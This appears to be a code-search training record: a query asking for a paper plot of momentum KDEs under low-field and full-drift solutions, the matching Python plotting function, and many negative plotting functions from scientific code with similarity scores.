None\n except AssertionError:\n self.ts_decompose()\n\n fig, axes = plt.subplots(5, 1, figsize=(20, 9), sharex=True)\n axes[0].plot(self._res_decomp.observed)\n axes[0].set_ylabel(\"Original\")\n #\n axes[1].plot(self._arr_trend)\n axes[1].set_ylabel(\"Trend\")\n #\n axes[2].plot(self._arr_seasonal)\n axes[2].set_ylabel(\"Seasonal\")\n #\n axes[3].plot(self._arr_baseline)\n axes[3].set_ylabel(\"Baseline\")\n #\n axes[4].plot(self.residuals)\n axes[4].set_ylabel(\"Residuals\")\n #\n if self.upper_whisker_res is not None:\n axes[4].axhline(y=self.upper_whisker_res,\n xmin=0,\n xmax=1, color='m',\n label='upper_whisker',\n linestyle='--', linewidth=1.5)\n axes[4].axhline(y=-self.upper_whisker_res,\n xmin=0,\n xmax=1, color='m',\n label='upper_whisker',\n linestyle='--', linewidth=1.5)\n\n plt.gcf().autofmt_xdate()\n plt.grid(True)\n plt.show()", "def plot_tsnes():\n # Two environments (for main paper figure. All for final figure)\n ENVS = [\n \"BipedalWalker-v3\",\n #\"LunarLander-v2\",\n #\"Pendulum-v0\"\n \"Acrobot-v1\",\n #\"CartPole-v1\"\n ]\n ALGO_TYPES = [\n \"stablebaselines\",\n \"stablebaselines\",\n \"wann\",\n \"wann\",\n ]\n ALGO_NAMES = [\n \"A2C\",\n \"PPO\",\n \"NEAT\",\n \"CMAES\",\n ]\n ALGO_PRETTY_NAMES = [\n \"A2C\",\n \"PPO\",\n \"NEAT\",\n \"CMA-ES\"\n ]\n\n REWARD_SCALES = {\n \"Pendulum-v0\": [-1600, -200],\n \"Acrobot-v1\": [-500, -100],\n \"LunarLander-v2\": [-230, 200],\n \"BipedalWalker-v3\": [-100, 300],\n \"CartPole-v1\": [0, 500]\n }\n\n figure, axs = pyplot.subplots(\n figsize=[6.4 * 2, 4.8],\n nrows=2,\n ncols=4,\n gridspec_kw={'hspace': 0, 'wspace': 0},\n )\n\n for plot_i in range(2):\n env = ENVS[plot_i]\n reward_scale = REWARD_SCALES[env]\n for algo_i in range(len(ALGO_TYPES)):\n column_idx = (algo_i % 2) + plot_i * 2\n row_idx = 0 if algo_i <= 1 else 1\n ax = axs[row_idx, column_idx]\n algo_type = ALGO_TYPES[algo_i]\n algo_name = ALGO_NAMES[algo_i]\n algo_pretty_name = ALGO_PRETTY_NAMES[algo_i]\n\n experiment_glob = \"experiments/{}_{}_{}_*\".format(algo_type, env, algo_name)\n experiment_paths = glob(experiment_glob)\n tsnes = []\n rewards = []\n for experiment_path in experiment_paths:\n pivector_paths = glob(os.path.join(experiment_path, \"pivectors\", \"*\"))\n population_tsnes = []\n population_rewards = []\n for path in pivector_paths:\n data = np.load(path)\n population_tsnes.append(data[\"tsne\"])\n population_rewards.append(data[\"average_episodic_reward\"])\n data.close()\n tsnes.append(population_tsnes)\n rewards.append(population_rewards)\n tsnes = np.concatenate(tsnes, axis=0)\n rewards = np.concatenate(rewards, axis=0)\n\n # Min-max normalization\n rewards = (rewards - reward_scale[0]) / (reward_scale[1] - reward_scale[0])\n\n scatter = ax.scatter(\n tsnes[:, 0],\n tsnes[:, 1],\n c=rewards,\n cmap=\"plasma\",\n s=1,\n vmin=0,\n vmax=1\n )\n\n ax.text(0.98, 0.98, algo_pretty_name, horizontalalignment=\"right\", verticalalignment=\"top\", transform=ax.transAxes)\n ax.set_xticks([])\n ax.set_yticks([])\n # Hide spines, the outer edges\n ax.spines[\"top\"].set_alpha(0.2)\n ax.spines[\"bottom\"].set_alpha(0.2)\n ax.spines[\"left\"].set_alpha(0.2)\n ax.spines[\"right\"].set_alpha(0.2)\n # Hide edge spines and bolden mid-spines\n if row_idx == 0:\n ax.spines[\"top\"].set_visible(False)\n else:\n ax.spines[\"bottom\"].set_visible(False)\n if column_idx == 0:\n ax.spines[\"left\"].set_visible(False)\n elif column_idx == 1:\n ax.spines[\"right\"].set_alpha(1.0)\n elif column_idx == 2:\n ax.spines[\"left\"].set_alpha(1.0)\n elif column_idx == 3:\n ax.spines[\"right\"].set_visible(False)\n\n # Add titles\n if row_idx == 0 and (column_idx == 0 or column_idx == 2):\n ax.set_title(env.split(\"-\")[0], x=1.0)\n\n cbaxes = figure.add_axes([0.4, 0.94, 0.2, 0.02])\n cbar = figure.colorbar(scatter, orientation=\"horizontal\", cax=cbaxes)\n cbar.set_ticks([0.0, 0.5, 1.0])\n cbar.set_ticklabels([\"Min\", \"Reward\", \"Max\"])\n cbar.ax.xaxis.set_ticks_position('top')\n cbar.ax.xaxis.set_label_position('top')\n cbar.ax.tick_params(labelsize=\"small\", length=0)\n figure.tight_layout()\n figure.savefig(\"figures/tsnes.png\", dpi=200, bbox_inches=\"tight\", pad_inches=0.0)", "def compare_averages_shell_pspec_dft():\n\n select_radius = 5. #degrees\n\n Nside=256\n Npix = 12 * Nside**2\n Omega = 4*np.pi/float(Npix)\n\n Nfreq = 100\n freqs = np.linspace(167.0, 177.0, Nfreq)\n dnu = np.diff(freqs)[0]\n Z = 1420/freqs - 1.\n\n sig = 2.0\n mu = 0.0\n shell = np.random.normal(mu, sig, (Npix, Nfreq))\n\n dV = comoving_voxel_volume(Z[Nfreq/2], dnu, Omega)\n variances = []\n means = []\n pks = []\n\n gs = gridspec.GridSpec(2, 3)\n fig = pl.figure()\n\n ax0 = pl.subplot(gs[0, 0:2])\n ax1 = pl.subplot(gs[1, 0])\n ax3 = pl.subplot(gs[1, 1])\n ax2 = pl.subplot(gs[:, 2])\n\n steps = range(10,110,10)\n vmin,vmax = min(steps),max(steps)\n normalize = mcolors.Normalize(vmin=vmin, vmax=vmax)\n colormap = cm.viridis\n\n for n in steps:\n Nkbins = 100\n kbins, pk = pspec_funcs.shell_project_pspec(shell, Nside, select_radius, freqs=freqs, Nkbins=Nkbins, N_sections=n, cosmo=True, method='dft', error=False)\n variances.append(np.var(pk[0:Nkbins-5]))\n means.append(np.mean(pk[0:Nkbins-5]))\n pks.append(pk)\n ax0.plot(kbins, pk, label=str(n), color=colormap(normalize(n)))\n\n ax0.axhline(y=dV*sig**2, color='k', lw=2.0)\n# ax0.legend()\n scalarmappable = cm.ScalarMappable(norm=normalize, cmap=colormap)\n scalarmappable.set_array(steps)\n fig.colorbar(scalarmappable,label=r'Number of snapshots', ax=ax0)\n ax0.set_ylabel(r\"P(k) [mK$^2$ Mpc$^{3}]$\")\n ax0.set_xlabel(r\"k [Mpc$^{-1}]$\")\n ax1.plot(steps, np.array(variances), label=\"Variance\")\n ax1.set_ylabel(r\"Variance(P(k)) [mK$^4$ Mpc$^{6}]$\")\n ax1.set_xlabel(u\"Number of 5° snapshots\")\n ax3.plot(steps, means, label=\"Mean\")\n ax3.set_ylabel(r\"Mean(P(k)) [mK$^2$ Mpc$^{3}]$\")\n ax3.set_xlabel(u\"Number of 5° snapshots\")\n ax1.legend()\n ax3.legend()\n im = ax2.imshow(np.array(pks)[:,0:Nkbins-5], aspect='auto')#, norm=mcolors.LogNorm())\n fig.colorbar(im, ax=ax2)\n print('Fractional deviation: ', np.mean(np.abs(pk - dV*sig**2)))\n pl.show()", "def plotERP(self, ep):\n import os \n import matplotlib.pyplot as plt\n \n try:\n filename = ep.filename.split('\\\\')[-1].split('.fif')[0]\n filename = 'plotsEEG_'+filename.split('_')[0] \n except Exception as err: \n filename = 'plots_eeg_file' \n print(err) \n finally:\n print('Saving ERP plots at >>>>', os.getcwd())\n \n try:\n os.mkdir(os.path.join(os.getcwd(), filename)) \n os.chdir(os.path.join(os.getcwd(), filename)) \n except Exception as err:\n print(err) \n \n \n ep = ep.interpolate_bads(reset_bads='True', mode = 'accurate')\n ep.info['bads'] = []\n \n ep.plot_psd(area_mode='range',fmin=0, fmax=40, tmax=10.0).savefig(filename + '_psd')\n\n# picks = ['FC2', 'C4', 'Cz', 'C5', 'FC1'] \n \n ep.plot_image(picks = None, cmap='interactive', sigma=1) \n \n plt.savefig(filename + '_image') \n \n bands = [(0, 4, 'Delta'), (4, 8, 'Theta'), (8, 12, 'Alpha'),\n (12, 30, 'Beta'), (30, 45, 'Gamma')] \n \n ep.plot_psd_topomap(bands=bands, vmin=None, vmax=None, \n tmin=0, tmax=0.5).savefig(filename + '_psd_topo')\n \n ep.plot_sensors().savefig(filename + '_sensors_') \n \n ep.plot_topo_image(vmin=-25, vmax=25, title='ERF images', sigma=3.,\n fig_facecolor='w', font_color='k').savefig(filename + '_image_topo') \n \n ep.average().plot().savefig(filename + 'erp_average_')\n ep.average().plot_image().savefig(filename + '_erp_average_image')\n print('Saving ERP plots at >>>>', os.getcwd())", "def app(ngr=100,c2a=1.6235):\n import matplotlib.pyplot as plt\n\n ## small donuts\n # plt.gcf().clf()\n grs = main(mu=0,ngrains=ngr,tilt_1=30.,sigma=15)\n plt.gcf().savefig('small_doughnut.pdf',bbox_inches='tight')\n plt.gcf().clf()\n f = gen_file(lab='sm_doughnut',ngr=ngr)\n write_gr(f,grs)\n\n ## Big donuts\n grs = main(mu=0,ngrains=ngr,tilt_1=50.,sigma=15)\n plt.gcf().savefig('big_doughnut.pdf',bbox_inches='tight')\n plt.gcf().clf()\n f = gen_file(lab='big_doughnut',ngr=ngr)\n write_gr(f,grs)\n\n ## twin tilts (30).\n gr1=main(mu=0,ngrains=ngr/2,tilts_about_ax1=30.,sigma=45)\n plt.gcf().clf()\n gr2=main(mu=0,ngrains=ngr/2,tilts_about_ax1=-30.,sigma=45)\n plt.gcf().clf()\n grs =[]\n for i in range(len(gr1)):\n grs.append(gr1[i])\n grs.append(gr2[i])\n grs=np.array(grs)\n mypf=upf.polefigure(grains=grs,csym='hexag',cdim=[1,1,c2a])\n mypf.pf_new(poles=[[0,0,0,1],[1,0,-1,0]],cmap='jet',ix='TD',iy='RD')\n plt.gcf().savefig('t30.pdf',bbox_inches='tight')\n f = gen_file(lab='dbl_lets_30',ngr=ngr)\n write_gr(f,grs)\n\n ## twin tilts (50).\n gr1=main(mu=0,ngrains=ngr/2,tilts_about_ax1=50.,sigma=45)\n plt.gcf().clf()\n gr2=main(mu=0,ngrains=ngr/2,tilts_about_ax1=-50.,sigma=45)\n plt.gcf().clf()\n gr =[]\n for i in range(len(gr1)):\n gr.append(gr1[i])\n gr.append(gr2[i])\n gr=np.array(gr)\n mypf=upf.polefigure(grains=gr,csym='hexag',cdim=[1,1,c2a])\n mypf.pf_new(poles=[[0,0,0,1],[1,0,-1,0]],cmap='jet',ix='TD',iy='RD')\n plt.gcf().savefig('t50.pdf',bbox_inches='tight')\n plt.gcf().clf()\n f = gen_file(lab='dbl_lets_50',ngr=ngr)\n write_gr(f,gr)", "def plot_plateau(x,y,p,n,Vdc):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.set_xlabel('Vrf [V]')\n ax.set_ylabel('Current [nA]')\n fig.suptitle('Vdc = '+str(Vdc)+' n = '+str(n), fontsize=24)\n \n plt.plot(x,y,'x',label='Experimental data') \n t = np.linspace(min(x),max(x),1000)\n plt.plot(t,f(t,p[0],p[1],p[2]),label='Fit')\n plt.axhline(y=n*e*frequency*1e9, color='black', linestyle='-')\n\n ax.legend()\n plt.show(block=True)\n plt.pause(0.3)\n plt.close()\n \n return None", "def _kde_example(data):\n # Plot the data\n ch = chartify.Chart(blank_labels=True, y_axis_type=\"density\")\n ch.set_title(\"KDE plot\")\n ch.plot.kde(data_frame=data, values_column=\"unit_price\", color_column=\"fruit\")\n ch.show(_OUTPUT_FORMAT)", "def test_lightcurve_seismology_plot():\n KeplerLightCurveFile(TABBY_Q8).PDCSAP_FLUX.periodogram().plot()", "def figure2():\n # sim_data_XPP = pd.read_csv(\"XPP.dat\", delimiter=\" \", header=None) # Load the XPP simulation\n\n plot_settings = {'y_limits': [-25, 0],\n 'x_limits': None,\n 'y_ticks': [-25, -20, -15, -10, -5, 0],\n 'locator_size': 2.5,\n 'y_label': 'Current (nA)',\n 'x_ticks': [],\n 'scale_size': 0,\n 'x_label': \"\",\n 'scale_loc': 4,\n 'figure_name': 'figure_2',\n 'legend': ['I-Na', 'I-NaP'],\n 'legend_size': 8,\n 'y_on': True}\n\n t, y = solver(100) # Integrate solution\n t_short = np.where((t >= 8) & (t <= 18))[0] # shorter time bounds for plots A and C\n v, m, h, m_nap, h_na_p, n, m_t, h_t, m_p, m_n, h_n, z_sk, m_a, h_a, m_h, ca = y[:, ].T # Extract all variables\n\n \"\"\"\n Explicitly calculate all currents: Extra constants duplicated from function dydt to calculate currents\n \"\"\"\n g_na_bar = 0.7\n g_nap_bar = 0.05\n g_k_bar = 1.3\n g_p_bar = 0.05\n g_leak = 0.005\n g_a_bar = 1.0\n e_na = 60\n e_k = -80\n e_leak = -50\n e_ca = 40\n g_t_bar = 0.1\n g_n_bar = 0.05\n g_sk_bar = 0.3\n\n \"\"\"\n Calculate currents used in the plot\n \"\"\"\n i_na = g_na_bar * (m ** 3) * h * (v - e_na)\n i_na_p = g_nap_bar * m_nap * h_na_p * (v - e_na)\n i_k = g_k_bar * (n ** 4) * (v - e_k)\n i_leak = g_leak * (v - e_leak)\n i_t = g_t_bar * m_t * h_t * (v - e_ca)\n i_n = g_n_bar * m_n * h_n * (v - e_ca)\n i_p = g_p_bar * m_p * (v - e_ca)\n i_sk = g_sk_bar * (z_sk ** 2) * (v - e_k)\n i_a = g_a_bar * m_a * h_a * (v - e_k)\n\n plt.figure(figsize=(5, 3), dpi=96) # Create figure\n\n plt.subplot(2, 2, 1) # Generate subplot 1 (top left)\n plt.plot(t[t_short], i_na[t_short], 'k-')\n plt.plot(t[t_short], i_na_p[t_short], c='k', linestyle='dotted')\n alter_figure(plot_settings) # Alter figure for publication\n\n plt.subplot(2, 2, 2) # Generate subplot 2 (top right)\n plt.plot(t, i_t + i_n + i_p, 'k-')\n plt.plot(t, i_t, c='k', linestyle='dotted')\n plt.plot(t, i_p, 'k--')\n plt.plot(t, i_n, 'k-.')\n\n plot_settings['y_limits'] = [-2.5, 0]\n plot_settings['y_ticks'] = [-2.5, -2, -1.5, -1, -0.5, 0]\n plot_settings['locator_size'] = 0.25\n plot_settings['y_label'] = \"\"\n plot_settings['legend'] = ['I-Ca', 'I-T', 'I-P', 'I-N']\n alter_figure(plot_settings) # Alter figure for publication\n\n plt.subplot(2, 2, 3) # Generate subplot 3 (bottom left)\n plt.plot(t[t_short], i_k[t_short], 'k-')\n plt.plot(t[t_short], i_a[t_short], c='k', linestyle='dotted')\n plt.plot(t[t_short], i_leak[t_short], 'k-.')\n\n plot_settings['y_limits'] = [0, 25]\n plot_settings['y_ticks'] = [0, 5, 10, 15, 20, 25]\n plot_settings['locator_size'] = 2.5\n plot_settings['y_label'] = \"Current (nA)\"\n plot_settings['legend'] = ['I-K', 'I-A', 'I-leak']\n plot_settings['scale_size'] = 2\n plot_settings['scale_loc'] = 2\n alter_figure(plot_settings) # Alter figure for publication\n\n plt.subplot(2, 2, 4) # Generate subplot 4 (bottom left)\n\n plt.plot(t, i_sk, 'k-')\n # plt.plot(sim_data_XPP[0][900:]-200,sim_data_XPP[34][900:]) # Isk for XPP data\n\n plot_settings['y_limits'] = [0, 1]\n plot_settings['y_ticks'] = [0, 0.2, 0.4, 0.6, 0.8, 1]\n plot_settings['locator_size'] = 0.2\n plot_settings['y_label'] = \"\"\n plot_settings['legend'] = ['I-SK']\n plot_settings['scale_size'] = 20\n plot_settings['scale_loc'] = 2\n alter_figure(plot_settings, close=True) # Alter figure for publication", "def generate_plot(self):\r\n\t\tx, y = zip(*[p.p for p in self.universe])\r\n\t\tself.ax.cla()\r\n\t\tself.ax.plot(x, y, '.')\r\n\t\tself.ax.set_title('Universe at time: %d' % self.universe.time)\r\n\t\tself.ax.set_xlim([P_MU-4*P_STD, P_MU+4*P_STD])\r\n\t\tself.ax.set_ylim([P_MU-4*P_STD, P_MU+4*P_STD])", "def plot_proof_functions():\n\n def thm1_D(x):\n return abs(1 / (2 + x) - 3 / (5 + x)) + abs(1 / (2 + x) - 2 / (5 + x))\n\n def thm2_D(x):\n return abs(2 / (2 + x) - (1 / 2) / ((1 / 2) + x))\n\n plt.figure(figsize=(2, 1.5))\n x = np.linspace(0, 2, 1000)\n\n plt.plot(x, thm1_D(x))\n plt.xlim(0, 2)\n plt.ylim(0.15, 0.22)\n plt.vlines(1, 0, 1, linestyles='dashed', colors='grey', alpha=0.5)\n plt.hlines(1 / 6, 0, 2, linestyles='dashed', colors='grey', alpha=0.5)\n plt.ylabel('$D(Z)$')\n plt.xlabel('$s_Z / t$')\n plt.savefig('plots/thm1_D.pdf', bbox_inches='tight')\n plt.xticks(range(3), range(3))\n plt.close()\n\n print(f'Saved plot to: plots/thm1_D.pdf')\n\n plt.figure(figsize=(2, 1.5))\n x = np.linspace(0, 5, 1000)\n plt.vlines(1, 0, 1, linestyles='dashed', colors='grey', alpha=0.5)\n plt.hlines(1 / 3, 0, 5, linestyles='dashed', colors='grey', alpha=0.5)\n plt.plot(x, thm2_D(x))\n plt.xlim(0, 5)\n plt.ylim(0, 0.4)\n plt.xticks(range(6), range(6))\n\n plt.ylabel('$D(Z)$')\n plt.xlabel('$s_Z / t$')\n plt.savefig('plots/thm2_D.pdf', bbox_inches='tight')\n plt.close()\n\n print(f'Saved plot to: plots/thm2_D.pdf')" ]
[ "0.7816318", "0.70826715", "0.6468687", "0.61942935", "0.6098648", "0.60919285", "0.59449416", "0.58786696", "0.5867492", "0.58451384", "0.5830002", "0.58245164", "0.5811453", "0.5785101", "0.5761999", "0.57525295", "0.57412106", "0.5740107", "0.5730716", "0.5714857", "0.5704623", "0.5693303", "0.5685386", "0.56710327", "0.56552815", "0.56487155", "0.56362224", "0.56319755", "0.5629802", "0.5618879" ]
0.73915446
1
Make a paper plot for the momentum KDE of the lowfield, and fulldrift solutions.
def momentum_kde2_paperplot(fields): plt.figure(figsize=(2.65, 2.5)) ax = plt.axes([0.18, 0.17, 0.8, 0.8]) colorList = [med_color, high_color] lw = 1.5 i = 0 meankx_2 = [] meankx_3 = [] k_ax = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_ax_' + '2_' + "E_{:.1e}.npy".format(fields[0])) # ax.plot(k_ax, np.zeros(len(k_ax)), '-', linewidth=lw, color=eq_color, label='Equilibrium') # ax.plot(k_ax, np.zeros(len(k_ax)), '-', linewidth=lw, color=eq_color) ax.axhline(0, color='black', linestyle='--', linewidth=0.5) # ax.axvline(0, color='gray', linewidth=0.8, alpha=0.5) for ee in fields: ee_Vcm = ee/100 k_ax = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_ax_' + '2_' + "E_{:.1e}.npy".format(ee)) kdist_f0_2 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist_f0_' + '2_' + "E_{:.1e}.npy".format(ee)) kdist_2 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist' + '2_' + "E_{:.1e}.npy".format(ee)) kdist_f0_3 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist_f0_' + '3_' + "E_{:.1e}.npy".format(ee)) kdist_3 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist' + '3_' + "E_{:.1e}.npy".format(ee)) chi_2_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '2_' + "E_{:.1e}.npy".format(ee)) meankx_2.append(utilities.mean_kx(chi_2_i, electron_df)) chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + "E_{:.1e}.npy".format(ee)) meankx_3.append(utilities.mean_kx(chi_3_i, electron_df)) ax.plot(k_ax, kdist_2, '--', linewidth=lw, color=colorList[i], label='Cold '+r'{:.0f} '.format(ee/100)+r'$\rm V cm^{-1}$') ax.plot(k_ax, kdist_3, '-', linewidth=lw,color=colorList[i], label='Warm '+r'{:.0f} '.format(ee/100)+r'$\rm V cm^{-1}$') i = i + 1 # ax.plot(k_ax, kdist_f0_3, '--', linewidth=lw, color='black', label=r'$f_0$') # ax.plot(meankx_2,np.mean(abs(kdist_2))*np.ones(len(meankx_3)), '-', linewidth=lw, color='black') # ax.plot(meankx_3,np.mean(abs(kdist_3))*np.ones(len(meankx_3)), '-', linewidth=lw, color='black') ax.yaxis.set_major_formatter(FormatStrFormatter('%.1f')) ax.locator_params(axis='y', nbins=6) ax.locator_params(axis='x', nbins=6) # ax.tick_params(direction='in') ax.set_xlim(-0.085, 0.081) plt.xlabel(r'$\rm k_x \, \, (\AA^{-1})$') plt.ylabel(r'Deviational occupation $\rm \Delta f_{\mathbf{k}}$') # plt.grid(lw=0.8, linestyle='dotted') # plt.ylabel(r'$\delta f_{\mathbf{k}}/f_{\mathbf{k}}^0$') # plt.ylim([-1,1]) plt.legend(frameon=False,prop={'size':different_small_size}) plt.savefig(pp.figureLoc+'momentum_KDE2.png', dpi=600)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def momentum_kde_paperplot(fields):\n fig, (ax1, ax2, ax3) = plt.subplots(nrows=3, sharex=True)\n axisList = [ax1,ax2,ax3]\n i =0\n\n props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n for ee in fields:\n ee_Vcm = ee/100\n textstr = r'$E_{k_x}\\, = \\, %.1f \\, V \\, cm^{-1}$' % ee_Vcm\n k_ax = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_ax_' + '2_' + \"E_{:.1e}.npy\".format(ee))\n kdist_f0_2 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist_f0_' + '2_' + \"E_{:.1e}.npy\".format(ee))\n kdist_2 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist' + '2_' + \"E_{:.1e}.npy\".format(ee))\n\n kdist_f0_3 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist_f0_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n kdist_3 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist' + '3_' + \"E_{:.1e}.npy\".format(ee))\n axisList[i].fill(k_ax, kdist_2/np.max(kdist_f0_2), '--', linewidth=1, alpha=0.6, label='Cold '+r'$e^{-}$ '+r'$\\Delta f$',color='blue')\n axisList[i].fill(k_ax, kdist_3/np.max(kdist_f0_2), '--', linewidth=1, alpha=0.6, label='Warm '+r'$e^{-}$ '+r'$\\Delta f$',color='red')\n axisList[i].plot(k_ax, kdist_2/np.max(kdist_f0_2), '-', linewidth=1,color='blue')\n axisList[i].plot(k_ax, kdist_3/np.max(kdist_f0_2), '-', linewidth=1,color='red')\n axisList[i].plot(k_ax, kdist_f0_2/np.max(kdist_f0_2), '-', linewidth=1, label='Equilibrium Dist.',color='black')\n axisList[i].yaxis.set_major_formatter(FormatStrFormatter('%g'))\n axisList[i].locator_params(axis='y', nbins=3)\n axisList[i].locator_params(axis='x', nbins=5)\n axisList[i].set_xlim(-0.06,0.06)\n axisList[i].text(0.02, 0.92, textstr, transform=axisList[i].transAxes, verticalalignment='top', bbox=props)\n\n i = i+1\n plt.xlabel(r'$k_x \\, \\, (\\AA^{-1})$')\n ax2.set_ylabel('Occupation Probability (norm.)')\n axisList[0].legend(loc=\"upper right\")\n plt.savefig(pp.figureLoc+'momentum_KDE.png', bbox_inches='tight',dpi=600)", "def energy_kde_paperplot(fields,df):\n plt.figure()\n i = 0\n colorList = ['dodgerblue','tomato']\n lw = 2\n\n meanE_2 = []\n meanE_3 = []\n mup = np.min(df['energy [eV]']) - pp.mu\n chi_0 = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '2_' + \"E_{:.1e}.npy\".format(fields[0]))\n g_en_axis, _, _, _, _, _, _, _, _, _, _, _, _, _ = \\\n occupation_plotter.occupation_v_energy_sep(chi_0, df['energy [eV]'].values, df)\n plt.plot(g_en_axis - np.min(df['energy [eV]']), np.zeros(len(g_en_axis)), '-', color='black', lineWidth=lw,label='Equilibrium')\n\n for ee in fields:\n chi_2_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '2_' + \"E_{:.1e}.npy\".format(ee))\n # meanE_2 = utilities.mean_energy(chi_2_i,df)\n g_en_axis, g_ftot, g_chiax, g_f0ax, _, _, _, _, _, _, _, _,_,_ = \\\n occupation_plotter.occupation_v_energy_sep(chi_2_i, df['energy [eV]'].values, df)\n plt.plot(g_en_axis - np.min(df['energy [eV]']), g_chiax,'--',color = colorList[i],lineWidth=lw,label=r'Low Field {:.0f} '.format(ee/100)+r'$V \\, cm^{-1}$')\n print(integrate.trapz(g_chiax,g_en_axis))\n\n # plt.plot(meanE_2-np.min(df['energy [eV]']),0,'.')\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n g_en_axis, g_ftot, g_chiax, g_f0ax, _, _, _, _, _, _, _, _,_,_ = \\\n occupation_plotter.occupation_v_energy_sep(chi_3_i, df['energy [eV]'].values, df)\n plt.plot(g_en_axis - np.min(df['energy [eV]']), g_chiax,color = colorList[i],lineWidth=lw,label=r'Full Drift {:.0f} '.format(ee/100)+r'$V \\, cm^{-1}$')\n print(integrate.trapz(g_chiax,g_en_axis))\n\n i = i + 1\n # plt.plot(g_en_axis - np.min(df['energy [eV]']), g_f0ax, '--', color='black', lineWidth=lw,label=r'$f_0$')\n\n plt.legend()\n # plt.ylim([-0.02, 0.015])\n plt.xlabel(r'Energy above CBM ($eV$)')\n plt.ylabel(r'Deviational occupation $\\delta f_{\\mathbf{k}}$ (norm.)')\n # plt.ylabel(r'$\\delta f_{\\mathbf{k}}/f_{\\mathbf{k}}^0$')\n plt.savefig(pp.figureLoc+'energy_KDE.png', bbox_inches='tight',dpi=600)\n\n plt.figure()\n plt.plot(g_en_axis,g_chiax)\n\n plt.figure()\n Z, xedges, yedges = np.histogram2d(df['kx [1/A]']*chi_3_i,df['ky [1/A]']*chi_3_i)\n plt.pcolormesh(xedges, yedges, Z.T)\n\n from scipy.stats.kde import gaussian_kde\n g_inds,_,_ = utilities.gaas_split_valleys(df,False)\n g_df = df.loc[g_inds]\n\n x = g_df['kx [1/A]']*(chi_3_i[g_inds]+g_df['k_FD'])\n y = g_df['ky [1/A]']*(chi_3_i[g_inds]+g_df['k_FD'])\n\n # y = g_df['energy [eV]']*(chi_3_i[g_inds]+g_df['k_FD'])\n k = gaussian_kde(np.vstack([x, y]))\n xi, yi = np.mgrid[x.min():x.max():x.size ** 0.5 * 1j, y.min():y.max():y.size ** 0.5 * 1j]\n zi = k(np.vstack([xi.flatten(), yi.flatten()]))\n\n fig = plt.figure(figsize=(7, 8))\n ax1 = fig.add_subplot(211)\n ax2 = fig.add_subplot(212)\n\n # alpha=0.5 will make the plots semitransparent\n ax1.pcolormesh(xi, yi, zi.reshape(xi.shape), alpha=0.5)\n ax2.contourf(xi, yi, zi.reshape(xi.shape), alpha=0.5)\n\n ax1.set_xlim(x.min(), x.max())\n ax1.set_ylim(y.min(), y.max())\n ax2.set_xlim(x.min(), x.max())\n ax2.set_ylim(y.min(), y.max())", "def plot_dereddening():\n extinction_coefficients = {'2365-2764-1': np.array([0.2622, 0.844]), '4109-638-1': np.array([0.0524, 0.1576]),\n '2058-56-1': np.array([0.0751, 0.248]), '3642-2459-1': np.array([0.1907, 0.608]),\n '3999-1391-1': np.array([0.3911, 1.2480]), '2607-1448-1': np.array([0.0430, 0.1310])}\n cepheids = {'2365-2764-1': np.array([0.959, 2.09]), '4109-638-1': np.array([0.705, 2.385]), '2058-56-1':\n np.array([1.222, 1.333]), '3642-2459-1': np.array([1.088, 2.0518]), '3999-1391-1':\n np.array([1.360, 1.2567]), '2607-1448-1': np.array([1.484, 0.6963])}\n periods = {'2365-2764-1': 1.61, '4109-638-1': 15.31, '2058-56-1': 63.08, '3642-2459-1': 1.86, '3999-1391-1': 24.98,\n '2607-1448-1': 8.54}\n max_periods = max(periods.values())\n\n new_positions_bv_mv = [] # in M_V vs B-V space\n colors = []\n theoretical_position = []\n for obj in extinction_coefficients.keys():\n # new_positions_bv_mv.append(cepheids[obj]-extinction_coefficients[obj])\n new_positions_bv_mv.append(cepheids[obj])\n colors.append(periods[obj]/max_periods)\n theoretical_position.append(-2.78*np.log10(periods[obj])-1.35)\n\n for pos in range(len(new_positions_bv_mv)):\n plt.scatter(new_positions_bv_mv[pos][0], new_positions_bv_mv[pos][1], marker='^', facecolor='w', s=40)\n plt.scatter(new_positions_bv_mv[pos][0], theoretical_position[pos], marker='o', facecolor='r', s=50)\n return new_positions_bv_mv, colors", "def plot_kde():\n f, (ax1, ax2) = plt.subplots(1, 2, sharey=True, sharex=True)\n sns.kdeplot(data.data.numpy()[:,0], data.data.numpy()[:,1], color=\"r\", shade=True, ax=ax1)\n sns.kdeplot(dec_mean.data.numpy()[:,0], dec_mean.data.numpy()[:,1], color=\"b\", shade=True, ax=ax2)\n plt.show()\n plt.pause(1e-6)\n plt.gcf().clear()", "def plot_field_uncertainties():\n\n resize_size = (1000, 1000)\n\n\n dirs = [os.path.join(path_to_here, '../data/landscape_visualizations/{}/{}/'.format(drug_name, j)) for j in ['original', 'repeat_a', 'repeat_b']]\n if drug_name == 'DMSO':\n dirs = [os.path.join(path_to_here, '../data/landscape_visualizations/{}/{}/30_hours/'.format(drug_name, j)) for j in ['original', 'repeat_a', 'repeat_b']]\n\n def transform(x):\n if type(x) is np.ndarray:\n x = change_array_lims(x)\n x = np.log(x)\n return x\n\n F_unc_vmin = -7\n F_unc_vmax = -4\n sigma_vmin = -5\n sigma_vmax = 0 #0.4\n sigma_unc_vmin = -6\n sigma_unc_vmax = -2\n\n fig_Fs = [plt.figure() for _ in range(3)]\n fig_uncertainty = plt.figure()\n sigma_lists, F_arrays = [], []\n for idx_fig, dir in enumerate(dirs):\n\n p_list = _load_and_resize_list(dir+'p_list_0.pickle')\n D_list = _load_and_resize_list(dir+'D_list_0.pickle')\n U_array = 